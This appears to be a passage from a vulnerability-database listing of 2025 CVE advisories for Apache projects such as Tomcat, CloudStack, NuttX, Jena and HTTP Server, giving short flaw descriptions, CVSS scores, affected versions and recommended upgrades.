apache apisix *
CVE-2025-46701

Improper Handling of Case Sensitivity vulnerability in Apache Tomcat's CGI servlet allows bypass of security constraints that apply to the pathInfo component of a URI mapped to the CGI servlet. This issue affects Apache Tomcat: from 11.0.0-M1 through 11.0.6, from 10.1.0-M1 through 10.1.40, from 9.0.0.M1 through 9.0.104. The following versions were EOL at the time the CVE was created but are known to be affected: 8.5.0 through 8.5.100. Other, older, EOL versions may also be affected. Users are recommended to upgrade to version 11.0.7, 10.1.41 or 9.0.105, which fixes the issue.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
134c704f-9b21-4f2e-91b3-4a467353bcc0 7.3 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L 3.9 3.4

Products Affected

Vendor Product Version
apache tomcat *
CVE-2025-46762

Schema parsing in the parquet-avro module of Apache Parquet 1.15.0 and previous versions allows bad actors to execute arbitrary code. While 1.15.1 introduced a fix to restrict untrusted packages, the default setting of trusted packages still allows malicious classes from these packages to be executed. The exploit is only applicable if the client code of parquet-avro uses the "specific" or the "reflect" models deliberately for reading Parquet files. ("generic" model is not impacted) Users are recommended to upgrade to 1.15.2 or set the system property "org.apache.parquet.avro.SERIALIZABLE_PACKAGES" to an empty string on 1.15.1. Both are sufficient to fix the issue.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 3.9 5.9

Products Affected

Vendor Product Version
apache parquet *
CVE-2025-47410

Apache Geode is vulnerable to CSRF attacks through GET requests to the Management and Monitoring REST API that could allow an attacker who has tricked a user into giving up their Geode session credentials to submit malicious commands on the target system on behalf of the authenticated user. This issue affects Apache Geode: versions 1.10 through 1.15.1. Users are recommended to upgrade to version 1.15.2, which fixes the issue.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
134c704f-9b21-4f2e-91b3-4a467353bcc0 8.8 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H 2.8 5.9

Products Affected

Vendor Product Version
apache geode *
CVE-2025-47411

A user with a legitimate non-administrator account can exploit a vulnerability in the user ID creation mechanism in Apache StreamPipes that allows them to swap the username of an existing user with that of an administrator. This vulnerability allows an attacker to gain administrative control over the application by manipulating JWT tokens, which can lead to data tampering, unauthorized access and other security issues. This issue affects Apache StreamPipes: through 0.97.0. Users are recommended to upgrade to version 0.98.0, which fixes the issue.

Products Affected

Vendor Product Version
apache streampipes *
CVE-2025-47436

Heap-based Buffer Overflow vulnerability in Apache ORC. A vulnerability has been identified in the ORC C++ LZO decompression logic, where specially crafted malformed ORC files can cause the decompressor to allocate a 250-byte buffer and then attempt to copy 295 bytes into it, causing memory corruption. This issue affects Apache ORC C++ library: through 1.8.8, from 1.9.0 through 1.9.5, from 2.0.0 through 2.0.4, from 2.1.0 through 2.1.1. Users are recommended to upgrade to version 1.8.9, 1.9.6, 2.0.5, and 2.1.2, which fix the issue.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 3.9 5.9

Products Affected

Vendor Product Version
apache orc *
CVE-2025-47713

A privilege escalation vulnerability exists in Apache CloudStack versions 4.10.0.0 through 4.20.0.0 where a malicious Domain Admin user in the ROOT domain can reset the password of user-accounts of Admin role type. This operation is not appropriately restricted and allows the attacker to assume control over higher-privileged user-accounts. A malicious Domain Admin attacker can impersonate an Admin user-account and gain access to sensitive APIs and resources that could result in the compromise of resource integrity and confidentiality, data loss, denial of service, and availability of infrastructure managed by CloudStack. Users are recommended to upgrade to Apache CloudStack 4.19.3.0 or 4.20.1.0, which fixes the issue with the following:
* Strict validation on Role Type hierarchy: the caller's user-account role must be equal to or higher than the target user-account's role.
* API privilege comparison: the caller must possess all privileges of the user they are operating on.
* Two new domain-level settings (restricted to the default Admin):
  - role.types.allowed.for.operations.on.accounts.of.same.role.type: Defines which role types are allowed to act on users of the same role type. Default: "Admin, DomainAdmin, ResourceAdmin".
  - allow.operations.on.users.in.same.account: Allows/disallows user operations within the same account. Default: true.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
134c704f-9b21-4f2e-91b3-4a467353bcc0 8.8 HIGH CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H 2.8 5.9

Products Affected

Vendor Product Version
apache cloudstack *
CVE-2025-47849

A privilege escalation vulnerability exists in Apache CloudStack versions 4.10.0.0 through 4.20.0.0 where a malicious Domain Admin user in the ROOT domain can get the API key and secret key of user-accounts of Admin role type in the same domain. This operation is not appropriately restricted and allows the attacker to assume control over higher-privileged user-accounts. A malicious Domain Admin attacker can impersonate an Admin user-account and gain access to sensitive APIs and resources that could result in the compromise of resource integrity and confidentiality, data loss, denial of service, and availability of infrastructure managed by CloudStack. Users are recommended to upgrade to Apache CloudStack 4.19.3.0 or 4.20.1.0, which fixes the issue with the following:
* Strict validation on Role Type hierarchy: the caller's role must be equal to or higher than the target user's role.
* API privilege comparison: the caller must possess all privileges of the user they are operating on.
* Two new domain-level settings (restricted to the default admin):
  - role.types.allowed.for.operations.on.accounts.of.same.role.type: Defines which role types are allowed to act on users of the same role type. Default: "Admin, DomainAdmin, ResourceAdmin".
  - allow.operations.on.users.in.same.account: Allows/disallows user operations within the same account. Default: true.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
134c704f-9b21-4f2e-91b3-4a467353bcc0 8.8 HIGH CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H 2.8 5.9

Products Affected

Vendor Product Version
apache cloudstack *
CVE-2025-47868

Out-of-bounds Write resulting in possible Heap-based Buffer Overflow vulnerability was discovered in the tools/bdf-converter font conversion utility that is part of the Apache NuttX RTOS repository. This standalone program is optional and neither part of the NuttX RTOS nor the Applications runtime, but active bdf-converter users may be affected when this tool is exposed to externally provided user data (i.e. publicly available automation). This issue affects Apache NuttX: from 6.9 before 12.9.0. Users are recommended to upgrade to version 12.9.0, which fixes the issue.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
134c704f-9b21-4f2e-91b3-4a467353bcc0 9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 3.9 5.9

Products Affected

Vendor Product Version
apache nuttx *
CVE-2025-47869

Improper Restriction of Operations within the Bounds of a Memory Buffer vulnerability was discovered in the Apache NuttX RTOS apps/examples/xmlrpc application. In this example application, the device stats structure that stored remotely provided parameters had a hardcoded buffer size, which could lead to a buffer overflow. Structure member buffers were updated to a valid size of CONFIG_XMLRPC_STRINGSIZE+1. This issue affects Apache NuttX RTOS users that may have used or based their code on the example application as presented in releases from 6.22 before 12.9.0. Users of XMLRPC in Apache NuttX RTOS are advised to review their code for this pattern and update buffer sizes as presented in the version of the example in release 12.9.0.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
134c704f-9b21-4f2e-91b3-4a467353bcc0 9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 3.9 5.9

Products Affected

Vendor Product Version
apache nuttx *
CVE-2025-48208

Improper Neutralization of Special Elements used in an LDAP Query ('LDAP Injection') vulnerability in Apache HertzBeat. The attacker needs to have an authenticated account with access, and the attack can only be triggered by crafting custom commands. A successful attack would result in arbitrary script execution. This issue affects Apache HertzBeat: through 1.7.2. Users are recommended to upgrade to version 1.7.3, which fixes the issue.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
134c704f-9b21-4f2e-91b3-4a467353bcc0 8.8 HIGH CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H 2.8 5.9
nvd@nist.gov 8.8 HIGH CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H 2.8 5.9

Products Affected

Vendor Product Version
apache hertzbeat *
CVE-2025-48392

A vulnerability in Apache IoTDB. This issue affects Apache IoTDB: from 1.3.3 through 1.3.4, from 2.0.1-beta through 2.0.4. Users are recommended to upgrade to version 2.0.5, which fixes the issue.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
134c704f-9b21-4f2e-91b3-4a467353bcc0 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H 3.9 3.6
nvd@nist.gov 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H 3.9 3.6

Products Affected

Vendor Product Version
apache iotdb *
CVE-2025-48431

Mismatched Memory Management Routines vulnerability in Apache Thrift c_glib language bindings. This issue affects Apache Thrift: before 0.23.0. Users are recommended to upgrade to version 0.23.0, which fixes the issue. Description: Specially crafted requests can crash a c_glib-based Thrift server with a clean but fatal "free(): invalid pointer" error message.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
134c704f-9b21-4f2e-91b3-4a467353bcc0 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H 3.9 3.6

Products Affected

Vendor Product Version
apache thrift *
CVE-2025-48459

Deserialization of Untrusted Data vulnerability in Apache IoTDB. This issue affects Apache IoTDB: from 1.0.0 before 2.0.5. Users are recommended to upgrade to version 2.0.5, which fixes the issue.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 5.3 MEDIUM CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N 3.9 1.4
134c704f-9b21-4f2e-91b3-4a467353bcc0 5.3 MEDIUM CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N 3.9 1.4

Products Affected

Vendor Product Version
apache iotdb *
CVE-2025-48734

Improper Access Control vulnerability in Apache Commons. A special BeanIntrospector class was added in version 1.9.2. This can be used to stop attackers from using the declared class property of Java enum objects to get access to the classloader. However this protection was not enabled by default. PropertyUtilsBean (and consequently BeanUtilsBean) now disallows declared class level property access by default. Releases 1.11.0 and 2.0.0-M2 address a potential security issue when accessing enum properties in an uncontrolled way. If an application using Commons BeanUtils passes property paths from an external source directly to the getProperty() method of PropertyUtilsBean, an attacker can access the enum's class loader via the "declaredClass" property available on all Java "enum" objects. Accessing the enum's "declaredClass" allows remote attackers to access the ClassLoader and execute arbitrary code. The same issue exists with PropertyUtilsBean.getNestedProperty(). Starting in versions 1.11.0 and 2.0.0-M2 a special BeanIntrospector suppresses the "declaredClass" property. Note that this new BeanIntrospector is enabled by default, but you can disable it to regain the old behavior; see section 2.5 of the user's guide and the unit tests. This issue affects Apache Commons BeanUtils 1.x before 1.11.0, and 2.x before 2.0.0-M2. Users of the artifact commons-beanutils:commons-beanutils 1.x are recommended to upgrade to version 1.11.0, which fixes the issue. Users of the artifact org.apache.commons:commons-beanutils2 2.x are recommended to upgrade to version 2.0.0-M2, which fixes the issue.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
134c704f-9b21-4f2e-91b3-4a467353bcc0 8.8 HIGH CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H 2.8 5.9

Products Affected

Vendor Product Version
apache commons_beanutils 2.0.0
apache commons_beanutils *
CVE-2025-48768

Release of Invalid Pointer or Reference vulnerability was discovered in fs/inode/fs_inoderemove code of the Apache NuttX RTOS that allowed root filesystem inode removal leading to a debug assert trigger (that is disabled by default), NULL pointer dereference (handled differently depending on the target architecture), or in general, a Denial of Service. This issue affects Apache NuttX RTOS: from 10.0.0 before 12.10.0. Users of filesystem based services with write access that were exposed over the network (i.e. FTP) are affected and recommended to upgrade to version 12.10.0 that fixes the issue.

Products Affected

Vendor Product Version
apache nuttx *
CVE-2025-48769

Use After Free vulnerability was discovered in the fs/vfs/fs_rename code of the Apache NuttX RTOS, which, due to a recursive implementation and the use of a single buffer by two different pointer variables, allowed reallocation of a buffer of arbitrary user-provided size and a write to the previously freed heap chunk, which in specific cases could cause unintended virtual filesystem rename/move operation results. This issue affects Apache NuttX RTOS: from 7.20 before 12.11.0. Users of virtual filesystem based services with write access, especially when exposed over the network (i.e. FTP), are affected and recommended to upgrade to version 12.11.0, which fixes the issue.

Products Affected

Vendor Product Version
apache nuttx *
CVE-2025-48795

Apache CXF stores large stream based messages as temporary files on the local filesystem. A bug was introduced which means that the entire temporary file is read into memory and then logged. An attacker might be able to exploit this to cause a denial of service attack by causing an out of memory exception. In addition, it is possible to configure CXF to encrypt temporary files to prevent sensitive credentials from being cached unencrypted on the local filesystem, however this bug means that the cached files are written out to logs unencrypted. Users are recommended to upgrade to versions 3.5.11, 3.6.6, 4.0.7 or 4.1.1, which fixes this issue.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
134c704f-9b21-4f2e-91b3-4a467353bcc0 5.6 MEDIUM CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:L 2.2 3.4

Products Affected

Vendor Product Version
apache cxf 4.0.6
apache cxf 3.5.10
apache cxf 4.1.0
apache cxf 3.6.5
CVE-2025-48912

An authenticated malicious actor using specially crafted requests could bypass row level security configuration by injecting SQL into 'sqlExpression' fields. This allowed the execution of sub-queries to evade parsing defenses ultimately granting unauthorized access to data. This issue affects Apache Superset: before 4.1.2. Users are recommended to upgrade to version 4.1.2, which fixes the issue.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 6.5 MEDIUM CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N 2.8 3.6

Products Affected

Vendor Product Version
apache superset *
CVE-2025-48913

If untrusted users are allowed to configure JMS for Apache CXF, previously they could use RMI or LDAP URLs, potentially leading to code execution capabilities. This interface is now restricted to reject those protocols, removing this possibility. Users are recommended to upgrade to versions 3.6.8, 4.0.9 or 4.1.3, which fix this issue.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
134c704f-9b21-4f2e-91b3-4a467353bcc0 9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 3.9 5.9

Products Affected

Vendor Product Version
apache cxf *
CVE-2025-48924

Uncontrolled Recursion vulnerability in Apache Commons Lang. This issue affects Apache Commons Lang: Starting with commons-lang:commons-lang 2.0 to 2.6, and, from org.apache.commons:commons-lang3 3.0 before 3.18.0. The ClassUtils.getClass(...) methods can throw StackOverflowError on very long inputs. Because an Error is usually not handled by applications and libraries, a StackOverflowError could cause an application to stop. Users are recommended to upgrade to version 3.18.0, which fixes the issue.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
134c704f-9b21-4f2e-91b3-4a467353bcc0 5.3 MEDIUM CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L 3.9 1.4

Products Affected

Vendor Product Version
apache commons_lang *
CVE-2025-48976

Allocation of resources for multipart headers with insufficient limits enabled a DoS vulnerability in Apache Commons FileUpload. This issue affects Apache Commons FileUpload: from 1.0 before 1.6; from 2.0.0-M1 before 2.0.0-M4. Users are recommended to upgrade to versions 1.6 or 2.0.0-M4, which fix the issue.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
134c704f-9b21-4f2e-91b3-4a467353bcc0 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H 3.9 3.6

Products Affected

Vendor Product Version
apache commons_fileupload *
apache commons_fileupload 2.0.0
CVE-2025-48988

Allocation of Resources Without Limits or Throttling vulnerability in Apache Tomcat. This issue affects Apache Tomcat: from 11.0.0-M1 through 11.0.7, from 10.1.0-M1 through 10.1.41, from 9.0.0.M1 through 9.0.105. The following versions were EOL at the time the CVE was created but are known to be affected: 8.5.0 through 8.5.100. Other, older, EOL versions may also be affected. Users are recommended to upgrade to version 11.0.8, 10.1.42 or 9.0.106, which fix the issue.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
134c704f-9b21-4f2e-91b3-4a467353bcc0 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H 3.9 3.6

Products Affected

Vendor Product Version
apache tomcat *
CVE-2025-48989

Improper Resource Shutdown or Release vulnerability in Apache Tomcat made Tomcat vulnerable to the MadeYouReset attack. This issue affects Apache Tomcat: from 11.0.0-M1 through 11.0.9, from 10.1.0-M1 through 10.1.43 and from 9.0.0.M1 through 9.0.107. Older, EOL versions may also be affected. Users are recommended to upgrade to one of versions 11.0.10, 10.1.44 or 9.0.108, which fix the issue.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
134c704f-9b21-4f2e-91b3-4a467353bcc0 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H 3.9 3.6

Products Affected

Vendor Product Version
apache tomcat *
apache tomcat 9.0.0
CVE-2025-49124

Untrusted Search Path vulnerability in Apache Tomcat installer for Windows. During installation, the Tomcat installer for Windows used icacls.exe without specifying a full path. This issue affects Apache Tomcat: from 11.0.0-M1 through 11.0.7, from 10.1.0 through 10.1.41, from 9.0.23 through 9.0.105. The following versions were EOL at the time the CVE was created but are known to be affected: 8.5.0 through 8.5.100 and 7.0.95 through 7.0.109. Other EOL versions may also be affected. Users are recommended to upgrade to version 11.0.8, 10.1.42 or 9.0.106, which fix the issue.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
134c704f-9b21-4f2e-91b3-4a467353bcc0 8.4 HIGH CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 2.5 5.9

Products Affected

Vendor Product Version
apache tomcat *
CVE-2025-49125

Authentication Bypass Using an Alternate Path or Channel vulnerability in Apache Tomcat. When using PreResources or PostResources mounted other than at the root of the web application, it was possible to access those resources via an unexpected path. That path was likely not to be protected by the same security constraints as the expected path, allowing those security constraints to be bypassed. This issue affects Apache Tomcat: from 11.0.0-M1 through 11.0.7, from 10.1.0-M1 through 10.1.41, from 9.0.0.M1 through 9.0.105. The following versions were EOL at the time the CVE was created but are known to be affected: 8.5.0 through 8.5.100. Other, older, EOL versions may also be affected. Users are recommended to upgrade to version 11.0.8, 10.1.42 or 9.0.106, which fix the issue.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
134c704f-9b21-4f2e-91b3-4a467353bcc0 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N 3.9 3.6

Products Affected

Vendor Product Version
apache tomcat *
CVE-2025-49630

In certain proxy configurations, a denial of service attack against Apache HTTP Server versions 2.4.26 through 2.4.63 can be triggered by untrusted clients causing an assertion in mod_proxy_http2. Affected configurations are those where a reverse proxy is configured for an HTTP/2 backend, with ProxyPreserveHost set to "on".

CVSS 3.x

Source Score Severity Vector Exploitability Impact
134c704f-9b21-4f2e-91b3-4a467353bcc0 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H 3.9 3.6

Products Affected

Vendor Product Version
apache http_server *
CVE-2025-49656

Users with administrator access can create database files outside the files area of the Fuseki server. This issue affects Apache Jena versions up to 5.4.0. Users are recommended to upgrade to version 5.5.0, which fixes the issue.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
134c704f-9b21-4f2e-91b3-4a467353bcc0 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N 3.9 3.6

Products Affected

Vendor Product Version
apache jena *
CVE-2025-49763

The ESI plugin does not have a limit on maximum inclusion depth, which allows excessive memory consumption if malicious instructions are inserted. Users can use a new setting for the plugin (--max-inclusion-depth) to limit it. This issue affects Apache Traffic Server: from 10.0.0 through 10.0.5, from 9.0.0 through 9.2.10. Users are recommended to upgrade to version 9.2.11 or 10.0.6, which fixes the issue.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
134c704f-9b21-4f2e-91b3-4a467353bcc0 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H 3.9 3.6

Products Affected

Vendor Product Version
apache traffic_server *
CVE-2025-49812

In some mod_ssl configurations on Apache HTTP Server versions through to 2.4.63, an HTTP desynchronisation attack allows a man-in-the-middle attacker to hijack an HTTP session via a TLS upgrade. Only configurations using "SSLEngine optional" to enable TLS upgrades are affected. Users are recommended to upgrade to version 2.4.64, which removes support for TLS upgrade.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
134c704f-9b21-4f2e-91b3-4a467353bcc0 7.4 HIGH CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N 2.2 5.2

Products Affected

Vendor Product Version
apache http_server *
CVE-2025-50151

File access paths in configuration files uploaded by users with administrator access are not validated. This issue affects Apache Jena version up to 5.4.0. Users are recommended to upgrade to version 5.5.0, which does not allow arbitrary configuration upload.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
134c704f-9b21-4f2e-91b3-4a467353bcc0 8.8 HIGH CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H 2.8 5.9

Products Affected

Vendor Product Version
apache jena *
CVE-2025-50213

Failure to Sanitize Special Elements into a Different Plane (Special Element Injection) vulnerability in Apache Airflow Providers Snowflake. This issue affects Apache Airflow Providers Snowflake: before 6.4.0. Sanitization of table and stage parameters was added in CopyFromExternalStageToSnowflakeOperator to prevent SQL injection. Users are recommended to upgrade to version 6.4.0, which fixes the issue.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
134c704f-9b21-4f2e-91b3-4a467353bcc0 9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 3.9 5.9

Products Affected

Vendor Product Version
apache apache-airflow-providers-snowflake *
CVE-2025-52434

Concurrent Execution using Shared Resource with Improper Synchronization ('Race Condition') vulnerability in Apache Tomcat when using the APR/Native connector. This was particularly noticeable with client initiated closes of HTTP/2 connections. This issue affects Apache Tomcat: from 9.0.0.M1 through 9.0.106. The following versions were EOL at the time the CVE was created but are known to be affected: 8.5.0 through 8.5.100. Other, older, EOL versions may also be affected. Users are recommended to upgrade to version 9.0.107, which fixes the issue.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
134c704f-9b21-4f2e-91b3-4a467353bcc0 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H 3.9 3.6

Products Affected

Vendor Product Version
apache tomcat *
CVE-2025-52435

J2EE Misconfiguration: Data Transmission Without Encryption vulnerability in Apache NimBLE. Improper handling of the Pause Encryption procedure on the Link Layer results in a previously encrypted connection being left in an unencrypted state, allowing an eavesdropper to observe the remainder of the exchange. This issue affects Apache NimBLE: through 1.8.0. Users are recommended to upgrade to version 1.9.0, which fixes the issue.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
134c704f-9b21-4f2e-91b3-4a467353bcc0 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N 3.9 3.6

Products Affected

Vendor Product Version
apache nimble *
CVE-2025-52520

For some unlikely configurations of multipart upload, an Integer Overflow vulnerability in Apache Tomcat could lead to a DoS via bypassing of size limits. This issue affects Apache Tomcat: from 11.0.0-M1 through 11.0.8, from 10.1.0-M1 through 10.1.42, from 9.0.0.M1 through 9.0.106. The following versions were EOL at the time the CVE was created but are known to be affected: 8.5.0 through 8.5.100. Other, older, EOL versions may also be affected. Users are recommended to upgrade to version 11.0.9, 10.1.43 or 9.0.107, which fix the issue.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
134c704f-9b21-4f2e-91b3-4a467353bcc0 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H 3.9 3.6

Products Affected

Vendor Product Version
apache tomcat *
CVE-2025-53020

Late Release of Memory after Effective Lifetime vulnerability in Apache HTTP Server. This issue affects Apache HTTP Server: from 2.4.17 up to 2.4.63. Users are recommended to upgrade to version 2.4.64, which fixes the issue.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
134c704f-9b21-4f2e-91b3-4a467353bcc0 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H 3.9 3.6

Products Affected

Vendor Product Version
apache http_server *
CVE-2025-53192

** UNSUPPORTED WHEN ASSIGNED ** Improper Neutralization of Expression/Command Delimiters vulnerability in Apache Commons OGNL. This issue affects Apache Commons OGNL: all versions. When using the API Ognl.getValue​, the OGNL engine parses and evaluates the provided expression with powerful capabilities, including accessing and invoking related methods, etc. Although OgnlRuntime attempts to restrict certain dangerous classes and methods (such as java.lang.Runtime) through a blocklist, these restrictions are not comprehensive. Attackers may be able to bypass the restrictions by leveraging class objects that are not covered by the blocklist and potentially achieve arbitrary code execution. As this project is retired, we do not plan to release a version that fixes this issue. Users are recommended to find an alternative or restrict access to the instance to trusted users. NOTE: This vulnerability only affects products that are no longer supported by the maintainer.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
134c704f-9b21-4f2e-91b3-4a467353bcc0 8.8 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H 2.8 5.9

Products Affected

Vendor Product Version
apache commons_ognl *
CVE-2025-53470

Out-of-bounds Read vulnerability in the Apache NimBLE HCI H4 driver. A specially crafted HCI event could lead to an invalid memory read in the H4 driver. This issue affects Apache NimBLE: through 1.8. This issue requires a broken or bogus Bluetooth controller and thus severity is considered low. Users are recommended to upgrade to version 1.9, which fixes the issue.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
134c704f-9b21-4f2e-91b3-4a467353bcc0 3.1 LOW CVSS:3.1/AV:A/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N 1.6 1.4

Products Affected

Vendor Product Version
apache nimble *
CVE-2025-53477

NULL Pointer Dereference vulnerability in Apache NimBLE. Missing validation of the HCI connection complete event or the HCI command TX buffer could lead to a NULL pointer dereference. This issue requires disabled asserts and a broken or bogus Bluetooth controller and thus severity is considered low. This issue affects Apache NimBLE: through 1.8.0. Users are recommended to upgrade to version 1.9.0, which fixes the issue.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
134c704f-9b21-4f2e-91b3-4a467353bcc0 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H 3.9 3.6

Products Affected

Vendor Product Version
apache nimble *
CVE-2025-53506

Uncontrolled Resource Consumption vulnerability in Apache Tomcat if an HTTP/2 client did not acknowledge the initial settings frame that reduces the maximum permitted concurrent streams. This issue affects Apache Tomcat: from 11.0.0-M1 through 11.0.8, from 10.1.0-M1 through 10.1.42, from 9.0.0.M1 through 9.0.106. The following versions were EOL at the time the CVE was created but are known to be affected: 8.5.0 through 8.5.100. Other EOL versions may also be affected. Users are recommended to upgrade to version 11.0.9, 10.1.43 or 9.0.107, which fix the issue.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
134c704f-9b21-4f2e-91b3-4a467353bcc0 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H 3.9 3.6

Products Affected

Vendor Product Version
apache tomcat *
CVE-2025-53606

Deserialization of Untrusted Data vulnerability in Apache Seata (incubating). This issue affects Apache Seata (incubating): 2.4.0. Users are recommended to upgrade to version 2.5.0, which fixes the issue.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
134c704f-9b21-4f2e-91b3-4a467353bcc0 9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 3.9 5.9

Products Affected

Vendor Product Version
apache seata 2.4.0
CVE-2025-53689

Blind XXE vulnerabilities in jackrabbit-spi-commons and jackrabbit-core in Apache Jackrabbit < 2.23.2 due to usage of an unsecured document builder to load privileges. Users are recommended to upgrade to versions 2.20.17 (Java 8), 2.22.1 (Java 11) or 2.23.2 (Java 11, beta versions), which fix this issue. Earlier versions (up to 2.20.16) are not supported anymore, thus users should update to the respective supported version.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
134c704f-9b21-4f2e-91b3-4a467353bcc0 8.8 HIGH CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H 2.8 5.9

Products Affected

Vendor Product Version
apache jackrabbit 2.22.0
apache jackrabbit *
apache jackrabbit 2.23.0
apache jackrabbit 2.23.1
CVE-2025-53960

When issuing JSON Web Tokens (JWT), Apache StreamPark directly uses the user's password as the HMAC signing key (e.g., with the HS256 algorithm). An attacker can exploit this vulnerability to perform offline brute-force attacks on the user's password using a captured JWT, or to arbitrarily forge identity tokens for the user if the password is already known, ultimately leading to complete account takeover. This issue affects Apache StreamPark: from 2.0.0 before 2.1.7. Users are recommended to upgrade to version 2.1.7, which fixes the issue.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
134c704f-9b21-4f2e-91b3-4a467353bcc0 5.9 MEDIUM CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N 2.2 3.6

Products Affected

Vendor Product Version
apache streampark *
CVE-2025-54057

Improper Neutralization of Script-Related HTML Tags in a Web Page (Basic XSS) vulnerability in Apache SkyWalking. This issue affects Apache SkyWalking: <= 10.2.0. Users are recommended to upgrade to version 10.3.0, which fixes the issue.

Products Affected

Vendor Product Version
apache skywalking *
CVE-2025-54090

A bug in Apache HTTP Server 2.4.64 results in all "RewriteCond expr ..." tests evaluating as "true". Users are recommended to upgrade to version 2.4.65, which fixes the issue.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
134c704f-9b21-4f2e-91b3-4a467353bcc0 6.3 MEDIUM CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L 2.8 3.4

Products Affected

Vendor Product Version
apache http_server 2.4.64
CVE-2025-54466

